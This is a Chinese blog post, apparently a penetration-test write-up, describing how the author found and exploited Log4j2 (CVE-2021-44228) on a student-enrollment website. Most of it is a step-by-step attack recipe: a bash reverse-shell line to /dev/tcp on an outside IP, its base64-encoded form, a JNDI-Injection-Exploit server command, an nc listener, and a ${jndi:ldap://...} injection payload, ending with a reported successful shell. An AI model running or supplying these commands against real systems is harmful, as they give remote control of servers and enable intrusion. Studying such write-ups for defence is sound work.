首页 > 其他分享 >【记一次渗透测试无意发现的log4j2】

【记一次渗透测试无意发现的log4j2】

时间:2023-11-21 17:24:58浏览次数:37  
标签:渗透 com base64 无意 服务器 日志 log4j2 告警 bash

【告警发现】

在测一个迎新网站的时候发现态势告警dnslog家族请求,看了一下态势感知mmp,我还没测出洞来呢咋服务器自己请求*kmbs6r7ovd.burpcollaborator.net日志了,

 

根据域名搜了一下日志没有发现,然后看了一下服务器的相关日志,在告警服务器请求bp域名之前是“Apache Log4j2远程代码执行漏洞(CVE-2021-45105/CVE-2021-44228)”的日志。

 

【工具准备】

1.jndi工具:https://github.com/sayers522/JNDI-Injection-Exploit

反弹shell payload

bash -i >& /dev/tcp/12211.222.22.48/6666 0>&1

2.base64编码在线:https://ares-x.com/tools/runtime-exec

bash -c {echo,YmFzaCAtaSA+xxxxxxxxxjEuMzYuMTExLjQ4LzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}

3.在vps开启jndi服务

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAxxxxxxxxMTExLjQ4LzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "121.36.111.48"

 

4.在vps上监听反弹shell端口

nc -lvvp 6666

 【测试】

5.在每一个点测试payload

${jndi:ldap://asssssasdasdas/poc}

url编码

 

6.服务器加载恶意class类

 7.反弹shell成功

 态势告警

 【参考链接】

payload

https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce

标签:渗透,com,base64,无意,服务器,日志,log4j2,告警,bash
From: https://www.cnblogs.com/lyh1/p/17847049.html

相关文章

  • 渗透测试思路
    渗透测试思路1.信息收集服务器服务器系统/版本开放端口ip是否存在WAF网站指纹中间件cms证书dns系统敏感信息whois社工敏感目录、文件googlehack子域名备份数据2.漏洞挖掘浏览网站规模、大小、特点端口扫描、弱口令探测如心脏滴血、cve-2019-0708如m......
  • zoomeye与子域名收集(网络渗透测3)
    网址https://www.zoomeye.org 一与zoomeye(钟馗之眼)功能类似的搜索引擎:1、Google2、shodan(撒旦)网址https://www.shodan.io/Shodan是一种搜索引擎,它使用户可以搜索连接Internet的设备和明确的网站信息,用于查找在线存在的特定设备和设备类型。3、censys网址https://cens......
  • 虚拟机桥接模式(网络渗透测试2)
    题目:1、Kali虚拟机采用桥接模式;物理机连接Guet-WiFi,Kali中查看网络配置并截图,能获得IP地址吗?2、Kali虚拟机采用桥接模式;物理机连接手机热点,Kali中查看网络配置并截图,能获得IP地址吗?3、对于1、2的结果,进行总结分析。首先我们需要知道桥接模式,桥接模式即将主机网卡与虚拟机的网卡......
  • log4j2 配置详解小结
    日志框架log4j2功能强大,了解配置信息对于我们使用log4j2很有必要,今天学习下相关的配置。目录ConfigurationPropertiesAppendersAppenderAppender-ConsoleAppender-FileAppender-RollingFileLoggerRootFilterStatusPoliciesLayoutsJsonLayoutPatternLayoutConfiguration定义......
  • 什么是计算机安全领域的渗透测试
    渗透测试概述渗透测试,又被称为PenetrationTesting(或简称PenTest),是一种网络安全活动,旨在模拟恶意黑客的攻击行为,以评估计算机系统、网络或应用程序的安全性。渗透测试通过模拟各种攻击手法,验证潜在漏洞和弱点,为组织提供全面的安全评估。渗透测试的主要目的是发现潜在的安全漏洞,以......
  • Spring Boot 配置 log4j2
    本教程中,我们将学习如何在SpringBoot中整合使用Log4j2日志框架。Log4j2介绍SpringBoot中默认使用Logback作为日志框架,接下来我们将学习如何在SpringBoot中集成与配置Log4j2。在配置之前,我们需要知道的是Log4j2是Log4j的升级版,它在Log4j的基础上做了诸多改进:1.......
  • 渗透测试第二次实验
    网络空间引擎:白帽汇的fofa,知道创宇的ZoomEye,360的Quake,奇安信的hunter以及shodan和censys等等利用ZoomEye实现信息收集过程:搜索在CN的windows操作系统,运行为Apache的服务器:实时资产更新:可以看到最后更新i时间是2023-11-1508:01点击右上角数据更新即可获取实......
  • Log4j和Log4j2的使用、安装、配置讲解
    Log4j和Log4j2的使用、安装、配置讲解什么是日志?日志是记录系统或应用程序在运行过程中所发生事件或行为的详细信息的文件。它通常包括时间戳、事件类型、事件描述等信息,以便在需要时进行故障排查、性能优化、安全审计等工作。日志可以帮助开发人员和系统管理员诊断应用程序问题......
  • 后渗透
     1.生成木马msfvenom-pwindows/meterpreter/reverse_tcplhost=192.168.110.140lport=4444-fexe>shell.exe2.将生成的木马移动到/var/www/html目录下3.打开apache24.靶机和虚拟机相互ping5.靶机在网址上搜索192.168.40.129(虚拟机ip)/shell.exe下载文件6.打开msfc......
  • DVWA文件上传低级渗透流程(手把手教你)
    低级的文件上传环境没有进行过滤,所以可以直接上传一个php的木马文件,然后使用工具进行连接,进而获取到目标机器的图形化界面首先创建一个php的一句话木马文件保存为php格式,确定保存进入到上传文件的页面将方框内的相对路径复制粘贴到URL后面即可获得木马文件的绝对路径进入后若为空......